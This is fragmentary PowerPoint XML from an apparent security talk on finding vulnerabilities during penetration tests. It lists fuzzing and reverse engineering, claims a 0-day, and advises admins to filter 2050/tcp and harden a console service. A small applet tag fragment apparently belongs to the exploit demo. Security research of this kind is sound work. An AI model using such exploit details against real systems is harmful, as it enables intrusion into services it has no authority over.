          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;PARAM NAME="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>onLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" VALUE="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>onLoadConsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;/applet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"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35</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2658177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8640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a: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36</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 12" descr="gj"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1" noCrop="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763688" y="1412776"/>
            <a:ext cx="5904656" cy="4798866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1862723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417984"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CyberWar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>APT/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Booo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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37</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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9595" y="1772816"/>
            <a:ext cx="7428789" cy="3752800"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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724" y="1957028"/>
            <a:ext cx="8960276" cy="3384376"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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3528" y="1957028"/>
            <a:ext cx="8330419" cy="4208276"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288889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880" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Conclusions</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1268760"/>
            <a:ext cx="9217024" cy="4903812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pen-tester will get more profit if he tries to research something  // thx Cap!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pen-tester     security researcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We got 0-day 8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To admins:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set filter on 2050/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use both mitigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Less privileges for console user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set service password on console</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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38</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2336673" y="2131518"/>
            <a:ext cx="508473" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" dirty="0" smtClean="0"/>
              <a:t>∩</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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4796" y="4789884"/>
            <a:ext cx="21717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02722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94928" y="188640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="3175" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Номер слайда 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 6" descr="draft_lens2806042module29556622photo_1240639056fry-panique-questions.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="415628" y="1896353"/>
            <a:ext cx="3528392" cy="3274348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Группа 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4115892" y="2636912"/>
            <a:ext cx="4664752" cy="1800200"/>
            <a:chOff x="2688828" y="4509120"/>
            <a:chExt cx="4664752" cy="1800200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3635896" y="4509120"/>
              <a:ext cx="3717684" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>a.sintsov@dsecrg.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>dookie@inbox.ru</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>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10756" y="4653136"/>
              <a:ext cx="700078" cy="70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88828" y="5445224"/>
              <a:ext cx="731044" cy="714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563888" y="5078214"/>
              <a:ext cx="1696170" cy="1231106"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0"/>
                <a:t>@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
                <a:t>asintsov</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" sz="2800" dirty="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="ru-RU"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6896" y="201960"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1696176"/>
            <a:ext cx="8229600" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source code review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>formal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ormal methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ands…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fuzzing (bin/web)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	+  Typical bugs for class </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	+  Reverse Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hand testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Architecture Analysis (Logic flaws)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Database (CVE/exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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4008" y="2204864"/>
            <a:ext cx="3298558" cy="2187087"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1989765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1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pen-tester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> target 8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>how most dang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show real attacks and what an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can do</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Time:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not much )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Targets:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>arge number of targets, different types</a:t>
